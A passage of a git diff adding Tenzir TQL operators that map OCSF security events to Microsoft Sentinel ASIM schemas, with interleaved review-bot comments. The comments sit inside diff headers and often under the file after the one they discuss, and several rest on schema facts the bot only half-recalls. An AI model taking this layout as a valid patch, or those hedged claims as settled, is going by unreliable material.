 ocsf::derive
 ocsf::cast
diff --git a/microsoft/operators/asim/map.tql b/microsoft/operators/asim/map.tql
new file mode 100644
index 0000000..93204fc
--- /dev/null
+++ b/microsoft/operators/asim/map.tql
@@ -0,0 +1,22 @@
+---
+description: Microsoft event -> Microsoft Sentinel ASIM event.
+args:
+ positional:
+ - name: log
+ description: The field that holds a raw Microsoft event, such as Windows Event Log XML.
+ default: null
+---
+
+if class_uid? != null {
+ microsoft::asim::ocsf::map
+} else {
+ if $log != null {
+ _microsoft_asim_log = $log
+ microsoft::ocsf::map _microsoft_asim_log
+ } else {
+ microsoft::ocsf::map
+ }
+ ocsf::derive
+ ocsf::cast
+ microsoft::asim::ocsf::map
+}
diff --git a/microsoft/operators/asim/ocsf/account_change.tql b/microsoft/operators/asim/ocsf/account_change.tql
new file mode 100644
index 0000000..2d88067
--- /dev/null
+++ b/microsoft/operators/asim/ocsf/account_change.tql
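Review bot: The `if class_uid? != null` branch hands the event straight to `microsoft::asim::ocsf::map`, while the raw branch runs `ocsf::derive` and `ocsf::cast` first; if `ocsf::derive` is what fills `activity_name` from `activity_id`, an OCSF event that arrives with only the numeric ids will fall into the `_` arm of every class mapper's `match activity_name`. Either run the two operators in the OCSF branch as well, or state in the description that callers must derive and cast before this operator. The `log` description should also say that the argument is ignored once `class_uid` is present, e.g. `description: The field that holds a raw Microsoft event, such as Windows Event Log XML. Ignored when the input already carries class_uid.`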
@@ -0,0 +1,46 @@
+---
+description: OCSF Account Change event -> Microsoft Sentinel ASIM UserManagement event.
+---
+
+microsoft::asim::ocsf::helpers::common
+
+@name = "asim.user_management"
+asim.EventSchema = "UserManagement"
+asim.EventSchemaVersion = "0.1.2"
+asim.EventSeverity = asim.EventSeverity? else "Informational"
+asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid?
+if actor?.user?.domain? != null and actor?.user?.name? != null {
+ asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}"
+ asim.ActorUsernameType = "Windows"
+}
+assert asim.ActorUsername != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name}
+asim.ActorUserId = actor?.user?.uid?
+asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null
+
+match activity_name {
+ "Create" => { asim.EventType = "UserCreated" }
+ "Delete" => { asim.EventType = "UserDeleted" }
+ "Update" => { asim.EventType = "UserModified" }
+ "Lock" => { asim.EventType = "UserLocked" }
+ "Unlock" => { asim.EventType = "UserUnlocked" }
+ "Disable" => { asim.EventType = "UserDisabled" }
+ "Enable" => { asim.EventType = "UserEnabled" }
+ "Password Change" => { asim.EventType = "PasswordChanged" }
+ "Password Reset" => { asim.EventType = "PasswordReset" }
+ _ => { asim.EventType = "UserModified" }
+}
+
+asim.TargetUsername = user?.email_addr? else user?.name? else user?.uid?
+if user?.domain? != null and user?.name? != null {
+ asim.TargetUsername = f"{user.domain}\\{user.name}"
+ asim.TargetUsernameType = "Windows"
+}
+asim.TargetUserId = user?.uid?
+asim.TargetUserIdType = "SID" if (asim.TargetUserId?.starts_with("S-") else false) else null
+asim.GroupName = group?.name?
+asim.GroupId = group?.uid?
+asim.GroupIdType = "SID" if (asim.GroupId?.starts_with("S-") else false) else null
+asim.SrcIpAddr = src_endpoint?.ip?
+asim.SrcHostname = src_endpoint?.hostname?
+
+microsoft::asim::ocsf::helpers::finalize
diff --git a/microsoft/operators/asim/ocsf/authentication.tql b/microsoft/operators/asim/ocsf/authentication.tql
new file mode 100644
index 0000000..f0b9d16
--- /dev/null
+++ b/microsoft/operators/asim/ocsf/authentication.tql
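Review bot: `asim.TargetUsernameType` (and `asim.ActorUsernameType` above it) is only assigned inside the Windows-domain `if`, so a target taken from `user.email_addr` or a bare `user.name` ships with a null type although ASIM's UsernameType enumeration has `UPN` and `Simple` for exactly those shapes; assigning it next to the value, `asim.TargetUsernameType = "UPN" if user?.email_addr? != null else ("Simple" if user?.name? != null else null)`, before the domain branch overrides it keeps the type consistent with the name. The same gap exists in authentication.tql, authorize_session.tql and entity_management.tql. The `_` arm of `match activity_name` also folds every unlisted OCSF activity (as far as I recall the class has Attach Policy, Detach Policy and MFA Factor Enable/Disable) into `UserModified`; unless `common` preserves `activity_name` in an EventOriginal* column, a comment on that arm such as `# unlisted activities degrade to UserModified; the OCSF activity_name is not retained` would make the loss explicit.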
@@ -0,0 +1,58 @@
+---
+description: OCSF Authentication event -> Microsoft Sentinel ASIM Authentication event.
+---
+
+microsoft::asim::ocsf::helpers::common
+
+@name = "asim.authentication"
+asim.EventSchema = "Authentication"
+asim.EventSchemaVersion = "0.1.4"
+match activity_name {
+ "Logoff" => { asim.EventType = "Logoff" }
+ _ => { asim.EventType = "Logon" }
+}
+match logon_type? {
+ "System" => { asim.EventSubType = "System" }
+ "Interactive" | "Cached Interactive" | "Unlock" | "Cached Unlock" => {
+ asim.EventSubType = "Interactive"
+ }
+ "Network" | "Network Cleartext" => { asim.EventSubType = "Remote" }
+ "Remote Interactive" | "Cached Remote Interactive" => {
+ asim.EventSubType = "RemoteInteractive"
+ }
+ "OS Service" => { asim.EventSubType = "Service" }
+ _ => {}
+}
+if logon_type? != null {
+ asim.EventOriginalSubType = logon_type
+}
+asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid?
+if actor?.user?.domain? != null and actor?.user?.name? != null {
+ asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}"
+ asim.ActorUsernameType = "Windows"
+}
+asim.ActorUserId = actor?.user?.uid?
+asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null
+asim.ActorSessionId = actor?.session?.uid? else actor?.session?.uid_alt?
+asim.TargetUsername = user?.email_addr? else user?.name? else user?.uid?
+if user?.domain? != null and user?.name? != null {
+ asim.TargetUsername = f"{user.domain}\\{user.name}"
+ asim.TargetUsernameType = "Windows"
+ asim.TargetDomain = user.domain
+ asim.TargetDomainType = "Windows"
+}
+asim.TargetUserId = user?.uid?
+asim.TargetUserIdType = "SID" if (asim.TargetUserId?.starts_with("S-") else false) else null
+asim.TargetSessionId = session?.uid? else session?.uid_alt?
+asim.SrcIpAddr = src_endpoint?.ip?
+asim.SrcHostname = src_endpoint?.hostname?
+asim.SrcPortNumber = src_endpoint?.port?
+asim.TargetHostname = dst_endpoint?.hostname? else device?.hostname?
+asim.TargetAppId = service?.uid? else dst_endpoint?.uid?
+asim.TargetAppName = service?.name? else dst_endpoint?.svc_name?
+asim.LogonProtocol = auth_protocol?
+if auth_factors? != null {
+ asim.LogonMethod = auth_factors[0]?.factor_type?
+}
+
+microsoft::asim::ocsf::helpers::finalize
diff --git a/microsoft/operators/asim/ocsf/authorize_session.tql b/microsoft/operators/asim/ocsf/authorize_session.tql
new file mode 100644
index 0000000..00af6c7
--- /dev/null
+++ b/microsoft/operators/asim/ocsf/authorize_session.tql
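Review bot: The `match logon_type?` block and everything from `asim.ActorUsername` down to the `auth_factors` guard are repeated verbatim in authorize_session.tql, with only the `EventType` logic differing; a helper under `microsoft::asim::ocsf::helpers`, next to `common` and `finalize`, would keep the two mappers from drifting apart. The logon_type match also leaves `Batch` and `New Credentials` (both OCSF logon_type values, if I recall the enumeration correctly) without an `EventSubType`; if that is intentional, a comment on the `_ => {}` arm, `# Batch / New Credentials have no ASIM EventSubType; EventOriginalSubType keeps the raw value`, records it. Likewise every activity other than `Logoff`, including Kerberos ticket activities, becomes `Logon`, which deserves a one-line comment on the `_` arm of `match activity_name`.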
@@ -0,0 +1,55 @@
+---
+description: OCSF Authorize Session event -> Microsoft Sentinel ASIM Authentication event.
+---
+
+microsoft::asim::ocsf::helpers::common
+
+@name = "asim.authentication"
+asim.EventSchema = "Authentication"
+asim.EventSchemaVersion = "0.1.4"
+asim.EventType = "Elevate"
+match logon_type? {
+ "System" => { asim.EventSubType = "System" }
+ "Interactive" | "Cached Interactive" | "Unlock" | "Cached Unlock" => {
+ asim.EventSubType = "Interactive"
+ }
+ "Network" | "Network Cleartext" => { asim.EventSubType = "Remote" }
+ "Remote Interactive" | "Cached Remote Interactive" => {
+ asim.EventSubType = "RemoteInteractive"
+ }
+ "OS Service" => { asim.EventSubType = "Service" }
+ _ => {}
+}
+if logon_type? != null {
+ asim.EventOriginalSubType = logon_type
+}
+asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid?
+if actor?.user?.domain? != null and actor?.user?.name? != null {
+ asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}"
+ asim.ActorUsernameType = "Windows"
+}
+asim.ActorUserId = actor?.user?.uid?
+asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null
+asim.ActorSessionId = actor?.session?.uid? else actor?.session?.uid_alt?
+asim.TargetUsername = user?.email_addr? else user?.name? else user?.uid?
+if user?.domain? != null and user?.name? != null {
+ asim.TargetUsername = f"{user.domain}\\{user.name}"
+ asim.TargetUsernameType = "Windows"
+ asim.TargetDomain = user.domain
+ asim.TargetDomainType = "Windows"
+}
+asim.TargetUserId = user?.uid?
+asim.TargetUserIdType = "SID" if (asim.TargetUserId?.starts_with("S-") else false) else null
+asim.TargetSessionId = session?.uid? else session?.uid_alt?
+asim.SrcIpAddr = src_endpoint?.ip?
+asim.SrcHostname = src_endpoint?.hostname?
+asim.SrcPortNumber = src_endpoint?.port?
+asim.TargetHostname = dst_endpoint?.hostname? else device?.hostname?
+asim.TargetAppId = service?.uid? else dst_endpoint?.uid?
+asim.TargetAppName = service?.name? else dst_endpoint?.svc_name?
+asim.LogonProtocol = auth_protocol?
+if auth_factors? != null {
+ asim.LogonMethod = auth_factors[0]?.factor_type?
+}
+
+microsoft::asim::ocsf::helpers::finalize
diff --git a/microsoft/operators/asim/ocsf/compliance_finding.tql b/microsoft/operators/asim/ocsf/compliance_finding.tql
new file mode 100644
index 0000000..035f6c8
--- /dev/null
+++ b/microsoft/operators/asim/ocsf/compliance_finding.tql
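Review bot: `asim.EventType = "Elevate"` is applied to every Authorize Session event regardless of `activity_name`, so an event whose activity is group assignment rather than privilege assignment (OCSF has an `Assign Groups` activity next to `Assign Privileges`, as far as I recall) is also reported as an elevation. A `match activity_name` with `"Assign Privileges" => { asim.EventType = "Elevate" }` and a commented default would make the choice explicit, and a comment on the current line would at least record that all activities are treated as elevation on purpose.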
@@ -0,0 +1,41 @@
+---
+description: OCSF Compliance Finding event -> Microsoft Sentinel ASIM AlertEvent.
+---
+
+microsoft::asim::ocsf::helpers::common
+
+@name = "asim.alert_event"
+asim.EventSchema = "AlertEvent"
+asim.EventSchemaVersion = "0.1"
+asim.EventType = "Alert"
+asim.EventUid = finding_info?.uid? else metadata?.original_event_uid?
+assert asim.EventUid != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name}
+
+asim.AlertName = finding_info?.title? else message?
+asim.EventReportUrl = finding_info?.url? else null
+asim.EventSubType = "Compliance Violation"
+asim.ThreatName = malware?[0]?.name? else finding_info?.title?
+asim.ThreatCategory = "Security Policy Violation"
+asim.ThreatOriginalCategory = finding_info?.types?[0]?
+asim.Username = user?.email_addr? else user?.name? else actor?.user?.email_addr? else actor?.user?.name?
+asim.UserId = user?.uid? else actor?.user?.uid?
+asim.UserIdType = "SID" if (asim.UserId?.starts_with("S-") else false) else null
+match status? {
+ "New" | "Active" | "In Progress" => {
+ asim.AlertStatus = "Active"
+ }
+ "Resolved" | "Closed" => {
+ asim.AlertStatus = "Closed"
+ }
+ _ => {}
+}
+asim.AlertOriginalStatus = status?
+match verdict? {
+ "True Positive" => { asim.AlertVerdict = "True Positive" }
+ "False Positive" => { asim.AlertVerdict = "False Positive" }
+ "Benign" => { asim.AlertVerdict = "Benign Positive" }
+ "Unknown" => { asim.AlertVerdict = "Unknown" }
+ _ => {}
+}
+
+microsoft::asim::ocsf::helpers::finalize
diff --git a/microsoft/operators/asim/ocsf/detection_finding.tql b/microsoft/operators/asim/ocsf/detection_finding.tql
new file mode 100644
index 0000000..cdc8b16
--- /dev/null
+++ b/microsoft/operators/asim/ocsf/detection_finding.tql
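Review bot: `match status?` matches `Active` and `Closed`, which are not values of the OCSF finding status enumeration (Unknown, New, In Progress, Suppressed, Resolved, Archived, Other, if I recall it correctly), while `Suppressed` and `Archived` fall through to `_ => {}` and leave `AlertStatus` null; `"Resolved" | "Archived" => { asim.AlertStatus = "Closed" }` plus an explicit decision for `Suppressed` would cover the inputs this mapper will actually see. `asim.EventReportUrl = finding_info?.url? else null` carries a redundant `else null`. The status and verdict matches are duplicated verbatim in detection_finding.tql and belong in a shared helper, and `asim.ThreatCategory = "Security Policy Violation"` being fixed for every compliance finding deserves a comment saying why.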
@@ -0,0 +1,56 @@
+---
+description: OCSF Detection Finding event -> Microsoft Sentinel ASIM AlertEvent.
+---
+
+let $threat_categories = {
+ adware: "Adware",
+ cryptominer: "Cryptominor",
+ malware: "Malware",
+ phishing: "Phishing",
+ ransomware: "Ransomware",
+ rootkit: "Rootkit",
+ spam: "Spam",
+ spoofing: "Spoofing",
+ spyware: "Spyware",
+ trojan: "Trojan",
+ virus: "Virus",
+ worm: "Worm",
+}
+
+microsoft::asim::ocsf::helpers::common
+
+@name = "asim.alert_event"
+asim.EventSchema = "AlertEvent"
+asim.EventSchemaVersion = "0.1"
+asim.EventType = "Alert"
+asim.EventUid = finding_info?.uid? else metadata?.original_event_uid?
+assert asim.EventUid != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name}
+
+asim.AlertName = finding_info?.title? else message?
+asim.EventReportUrl = finding_info?.url? else null
+asim.EventSubType = "Threat"
+asim.ThreatName = malware?[0]?.name? else finding_info?.title?
+asim.ThreatCategory = $threat_categories[finding_info?.types?[0]?.to_lower()]?
+asim.ThreatOriginalCategory = finding_info?.types?[0]?
+asim.Username = user?.email_addr? else user?.name? else actor?.user?.email_addr? else actor?.user?.name?
+asim.UserId = user?.uid? else actor?.user?.uid?
+asim.UserIdType = "SID" if (asim.UserId?.starts_with("S-") else false) else null
+match status? {
+ "New" | "Active" | "In Progress" => {
+ asim.AlertStatus = "Active"
+ }
+ "Resolved" | "Closed" => {
+ asim.AlertStatus = "Closed"
+ }
+ _ => {}
+}
+asim.AlertOriginalStatus = status?
+match verdict? {
+ "True Positive" => { asim.AlertVerdict = "True Positive" }
+ "False Positive" => { asim.AlertVerdict = "False Positive" }
+ "Benign" => { asim.AlertVerdict = "Benign Positive" }
+ "Unknown" => { asim.AlertVerdict = "Unknown" }
+ _ => {}
+}
+
+microsoft::asim::ocsf::helpers::finalize
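Review bot: `cryptominer: "Cryptominor"` reads as a typo, but if it mirrors the literal spelling in the ASIM AlertEvent ThreatCategory list it is the value Sentinel expects; a comment on that line, `# "Cryptominor" is the spelling used by the ASIM AlertEvent schema`, would stop the next reader from "correcting" it (confirm against the schema before adding it). `asim.ThreatCategory` also consults only `finding_info.types[0]` and yields null for any value outside the twelve keys, so a finding whose recognised category sits in a later element silently loses it; either iterate `types` or state the first-element choice in a comment next to the lookup.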
diff --git a/microsoft/operators/asim/ocsf/dhcp_activity.tql b/microsoft/operators/asim/ocsf/dhcp_activity.tql
new file mode 100644
index 0000000..2b95d96
--- /dev/null
+++ b/microsoft/operators/asim/ocsf/dhcp_activity.tql
@@ -0,0 +1,22 @@
+---
+description: OCSF DHCP Activity event -> Microsoft Sentinel ASIM DhcpEvent.
+---
+
+microsoft::asim::ocsf::helpers::common
+
+@name = "asim.dhcp_event"
+asim.EventSchema = "DhcpEvent"
+asim.EventSchemaVersion = "0.1.1"
+match activity_name {
+ "Ack" | "Offer" => { asim.EventType = "Assign" }
+ "Request" => { asim.EventType = "Renew" }
+ "Release" => { asim.EventType = "Release" }
+ _ => { asim.EventType = "Assign" }
+}
+asim.SrcHostname = src_endpoint?.hostname? else src_endpoint?.ip?.string()
+asim.SrcIpAddr = src_endpoint?.ip?
+asim.SrcMacAddr = src_endpoint?.mac?
+assert asim.SrcHostname != null and asim.SrcIpAddr != null and asim.SrcMacAddr != null,
+ message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name}
+
+microsoft::asim::ocsf::helpers::finalize
diff --git a/microsoft/operators/asim/ocsf/dns_activity.tql b/microsoft/operators/asim/ocsf/dns_activity.tql
new file mode 100644
index 0000000..c84f776
--- /dev/null
+++ b/microsoft/operators/asim/ocsf/dns_activity.tql
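Review bot: The `_` arm of `match activity_name` turns every unlisted activity into `Assign`, so a DHCP Nak, Decline, Expire, Discover or Inform (as far as I recall, all DHCP Activity activity names) would surface in Sentinel as an address assignment; `_ => {}` followed by an assert on `asim.EventType`, the strict pattern the sibling mappers already use, would fail loudly instead of mislabelling. `asim.SrcHostname = src_endpoint?.hostname? else src_endpoint?.ip?.string()` also writes the IP literal into a hostname column solely so the assert below can pass, which leaves host pivots with IP strings mixed into names; if the ASIM mandatory-field rule forces it, a comment such as `# ASIM DhcpEvent requires SrcHostname; fall back to the IP literal when the client sent no name` should say so.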
@@ -0,0 +1,26 @@
+---
+description: OCSF DNS Activity event -> Microsoft Sentinel ASIM Dns event.
+---
+
+microsoft::asim::ocsf::helpers::common
+
+@name = "asim.dns"
+asim.EventSchema = "Dns"
+asim.EventSchemaVersion = "0.1.7"
+asim.EventType = query?.opcode? else "Query"
+match activity_name {
+ "Query" => { asim.EventSubType = "request" }
+ "Response" => { asim.EventSubType = "response" }
+ _ => {}
+}
+asim.DnsQuery = query?.hostname?
+asim.DnsQueryTypeName = query?.type?
+asim.DnsQueryClassName = query?.class?
+asim.EventResultDetails = rcode? else "NA"
+asim.SrcIpAddr = src_endpoint?.ip?
+asim.SrcHostname = src_endpoint?.hostname?
+asim.DstIpAddr = dst_endpoint?.ip?
+asim.DstHostname = dst_endpoint?.hostname?
+assert asim.DnsQuery != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name}
+
+microsoft::asim::ocsf::helpers::finalize
diff --git a/microsoft/operators/asim/ocsf/entity_management.tql b/microsoft/operators/asim/ocsf/entity_management.tql
new file mode 100644
index 0000000..831ce0d
--- /dev/null
+++ b/microsoft/operators/asim/ocsf/entity_management.tql
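Review bot: `asim.EventResultDetails = rcode? else "NA"` carries the DNS response code, but nothing in this file derives `asim.EventResult` from it, so a response with NXDOMAIN or SERVFAIL keeps whatever `helpers::common` assigned — and common is outside this diff, so I cannot tell whether it maps `status` for DNS. If it does not, add after the rcode line `asim.EventResult = "Success" if (rcode? == "NoError" else false) else "Failure"` guarded by `activity_name == "Response"`, since a query has no outcome yet ("NoError" is OCSF's spelling of rcode_id 0, as far as I recall). Either way, a one-line comment stating where EventResult for DNS comes from would make the contract visible here.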
@@ -0,0 +1,40 @@
+---
+description: OCSF Entity Management event -> Microsoft Sentinel ASIM AuditEvent.
+---
+
+microsoft::asim::ocsf::helpers::common
+
+@name = "asim.audit_event"
+asim.EventSchema = "AuditEvent"
+asim.EventSchemaVersion = "0.1.2"
+asim.EventType = "Other"
+match activity_name {
+ "Create" => { asim.EventType = "Create" }
+ "Read" => { asim.EventType = "Read" }
+ "Update" | "Set" => { asim.EventType = "Set" }
+ "Delete" => { asim.EventType = "Delete" }
+ "Execute" => { asim.EventType = "Execute" }
+ "Install" => { asim.EventType = "Install" }
+ "Clear" => { asim.EventType = "Clear" }
+ "Enable" => { asim.EventType = "Enable" }
+ "Disable" => { asim.EventType = "Disable" }
+ "Start" => { asim.EventType = "Start" }
+ "Stop" => { asim.EventType = "Stop" }
+ _ => {}
+}
+asim.Operation = activity_name? else type_name? else asim.EventType
+asim.Object = job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path?
+assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name}
+asim.ObjectType = "Directory Service Object"
+asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid?
+if actor?.user?.domain? != null and actor?.user?.name? != null {
+ asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}"
+ asim.ActorUsernameType = "Windows"
+}
+asim.ActorUserId = actor?.user?.uid?
+asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null
+asim.SrcIpAddr = src_endpoint?.ip?
+asim.TargetHostname = dst_endpoint?.hostname?
+asim.TargetIpAddr = dst_endpoint?.ip?
+
+microsoft::asim::ocsf::helpers::finalize
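Review bot: entity_management.tql, event_log_activity.tql, scheduled_job_activity.tql and windows_service_activity.tql are identical except for the `asim.ObjectType` literal, so the activity-to-EventType table, the `asim.Object` fallback chain and the actor block are now maintained four times and a fix to one (the SID check, say) will drift from the others unnoticed. Since this package already declares positional operator arguments (the `args:` front matter in microsoft/operators/ocsf/map.tql), fold the shared body into a `helpers::audit_event` operator that takes the object type, leaving each class file as essentially `microsoft::asim::ocsf::helpers::audit_event "Directory Service Object"` — assuming user-defined operators accept a string positional the way `map` takes `log`. While doing so, the `asim.Object` chain reaching into `job`, `log_name`, `entity` and `win_service` from every class could become a second argument naming the class-specific object, which also makes the `assert asim.Object != null` failure message more precise. The same applies to the event_log_activity, scheduled_job_activity and windows_service_activity hunks below.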
diff --git a/microsoft/operators/asim/ocsf/event_log_activity.tql b/microsoft/operators/asim/ocsf/event_log_activity.tql
new file mode 100644
index 0000000..8644640
--- /dev/null
+++ b/microsoft/operators/asim/ocsf/event_log_activity.tql
@@ -0,0 +1,40 @@
+---
+description: OCSF Event Log Activity event -> Microsoft Sentinel ASIM AuditEvent.
+---
+
+microsoft::asim::ocsf::helpers::common
+
+@name = "asim.audit_event"
+asim.EventSchema = "AuditEvent"
+asim.EventSchemaVersion = "0.1.2"
+asim.EventType = "Other"
+match activity_name {
+ "Create" => { asim.EventType = "Create" }
+ "Read" => { asim.EventType = "Read" }
+ "Update" | "Set" => { asim.EventType = "Set" }
+ "Delete" => { asim.EventType = "Delete" }
+ "Execute" => { asim.EventType = "Execute" }
+ "Install" => { asim.EventType = "Install" }
+ "Clear" => { asim.EventType = "Clear" }
+ "Enable" => { asim.EventType = "Enable" }
+ "Disable" => { asim.EventType = "Disable" }
+ "Start" => { asim.EventType = "Start" }
+ "Stop" => { asim.EventType = "Stop" }
+ _ => {}
+}
+asim.Operation = activity_name? else type_name? else asim.EventType
+asim.Object = job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path?
+assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name}
+asim.ObjectType = "Event Log"
+asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid?
+if actor?.user?.domain? != null and actor?.user?.name? != null {
+ asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}"
+ asim.ActorUsernameType = "Windows"
+}
+asim.ActorUserId = actor?.user?.uid?
+asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null
+asim.SrcIpAddr = src_endpoint?.ip?
+asim.TargetHostname = dst_endpoint?.hostname?
+asim.TargetIpAddr = dst_endpoint?.ip?
+
+microsoft::asim::ocsf::helpers::finalize
diff --git a/microsoft/operators/asim/ocsf/file_system_activity.tql b/microsoft/operators/asim/ocsf/file_system_activity.tql
new file mode 100644
index 0000000..c53fb0d
--- /dev/null
+++ b/microsoft/operators/asim/ocsf/file_system_activity.tql
@@ -0,0 +1,37 @@
+---
+description: OCSF File System Activity event -> Microsoft Sentinel ASIM FileEvent.
+---
+
+microsoft::asim::ocsf::helpers::common
+
+@name = "asim.file_event"
+asim.EventSchema = "FileEvent"
+asim.EventSchemaVersion = "0.2.2"
+match activity_name {
+ "Create" => { asim.EventType = "FileCreated" }
+ "Read" | "Open" => { asim.EventType = "FileAccessed" }
+ "Update" | "Set Attributes" | "Set Security" => { asim.EventType = "FileModified" }
+ "Delete" => { asim.EventType = "FileDeleted" }
+ "Rename" => { asim.EventType = "FileRenamed" }
+ _ => { asim.EventType = "FileCreatedOrModified" }
+}
+asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid?
+if actor?.user?.domain? != null and actor?.user?.name? != null {
+ asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}"
+ asim.ActorUsernameType = "Windows"
+}
+asim.ActorUserId = actor?.user?.uid?
+asim.TargetFilePath = file?.path? else file?.name?
+asim.TargetFileName = file?.name? else asim.TargetFilePath?.split("\\")[-1]
+if activity_name == "Rename" and file_result? != null {
+ asim.SrcFilePath = asim.TargetFilePath
+ asim.SrcFileName = asim.TargetFileName
+ asim.SrcFilePathType = "Windows Local" if (asim.SrcFilePath?.contains("\\") else false) else "Unix Local"
+ asim.TargetFilePath = file_result.path? else asim.TargetFilePath
+ asim.TargetFileName = file_result.name? else asim.TargetFileName
+}
+asim.TargetFilePathType = "Windows Local" if (asim.TargetFilePath?.contains("\\") else false) else "Unix Local"
+assert asim.ActorUsername != null and asim.TargetFilePath != null,
+ message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name}
+
+microsoft::asim::ocsf::helpers::finalize
diff --git a/microsoft/operators/asim/ocsf/group_management.tql b/microsoft/operators/asim/ocsf/group_management.tql
new file mode 100644
index 0000000..5d18efd
--- /dev/null
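Review bot: `asim.TargetFileName = file?.name? else asim.TargetFilePath?.split("\\")[-1]` splits only on the Windows separator, so for a Unix path such as `/etc/shadow` the whole path becomes the file name — even though `TargetFilePathType` a few lines later already recognises `Unix Local` paths by the absence of a backslash. Derive the name with the same rule, e.g. `asim.TargetFileName = file?.name? else (asim.TargetFilePath?.split("\\")[-1] if (asim.TargetFilePath?.contains("\\") else false) else asim.TargetFilePath?.split("/")[-1])`. The Rename branch copies the already-derived name into `SrcFileName`, so it inherits the same defect, and the identical single-separator split appears for `TargetProcessName` in process_activity.tql.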
+++ b/microsoft/operators/asim/ocsf/group_management.tql
@@ -0,0 +1,42 @@
+---
+description: OCSF Group Management event -> Microsoft Sentinel ASIM UserManagement event.
+---
+
+microsoft::asim::ocsf::helpers::common
+
+@name = "asim.user_management"
+asim.EventSchema = "UserManagement"
+asim.EventSchemaVersion = "0.1.2"
+asim.EventSeverity = asim.EventSeverity? else "Informational"
+asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid?
+if actor?.user?.domain? != null and actor?.user?.name? != null {
+ asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}"
+ asim.ActorUsernameType = "Windows"
+}
+assert asim.ActorUsername != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name}
+asim.ActorUserId = actor?.user?.uid?
+asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null
+
+match activity_name {
+ "Create" => { asim.EventType = "GroupCreated" }
+ "Delete" => { asim.EventType = "GroupDeleted" }
+ "Add User" => { asim.EventType = "UserAddedToGroup" }
+ "Remove User" => { asim.EventType = "UserRemovedFromGroup" }
+ "Read" => { asim.EventType = "GroupRead" }
+ _ => { asim.EventType = "GroupModified" }
+}
+
+asim.TargetUsername = user?.email_addr? else user?.name? else user?.uid?
+if user?.domain? != null and user?.name? != null {
+ asim.TargetUsername = f"{user.domain}\\{user.name}"
+ asim.TargetUsernameType = "Windows"
+}
+asim.TargetUserId = user?.uid?
+asim.TargetUserIdType = "SID" if (asim.TargetUserId?.starts_with("S-") else false) else null
+asim.GroupName = group?.name?
+asim.GroupId = group?.uid?
+asim.GroupIdType = "SID" if (asim.GroupId?.starts_with("S-") else false) else null
+asim.SrcIpAddr = src_endpoint?.ip?
+asim.SrcHostname = src_endpoint?.hostname?
+
+microsoft::asim::ocsf::helpers::finalize
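Review bot: The `_ => { asim.EventType = "GroupModified" }` arm also catches OCSF's `Unknown` and `Other` activities, so an event whose activity the producer could not classify is reported to Sentinel as a definite group modification; a comment such as `// Unknown/Other activities are reported as GroupModified; EventOriginalType keeps the OCSF activity.` would at least make that choice explicit, if EventOriginalType is indeed set by `helpers::common`. Stylistically, this file sets `asim.EventType` after the actor block and its assert, whereas every sibling operator in this diff sets it right after `EventSchemaVersion`; moving the `match activity_name` block up keeps the files scannable in the same order.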
diff --git a/microsoft/operators/ocsf/asim/common.tql b/microsoft/operators/asim/ocsf/helpers/common.tql
similarity index 100%
rename from microsoft/operators/ocsf/asim/common.tql
rename to microsoft/operators/asim/ocsf/helpers/common.tql
diff --git a/microsoft/operators/asim/ocsf/helpers/finalize.tql b/microsoft/operators/asim/ocsf/helpers/finalize.tql
new file mode 100644
index 0000000..f55a356
--- /dev/null
+++ b/microsoft/operators/asim/ocsf/helpers/finalize.tql
@@ -0,0 +1,7 @@
+---
+description: Finalizes an initialized ASIM event and preserves the original OCSF event.
+---
+
+asim.AdditionalFields = {...this}
+drop asim.AdditionalFields.asim
+this = asim
diff --git a/microsoft/operators/ocsf/asim/unsupported.tql b/microsoft/operators/asim/ocsf/helpers/unsupported.tql
similarity index 73%
rename from microsoft/operators/ocsf/asim/unsupported.tql
rename to microsoft/operators/asim/ocsf/helpers/unsupported.tql
index fe57184..9388c7d 100644
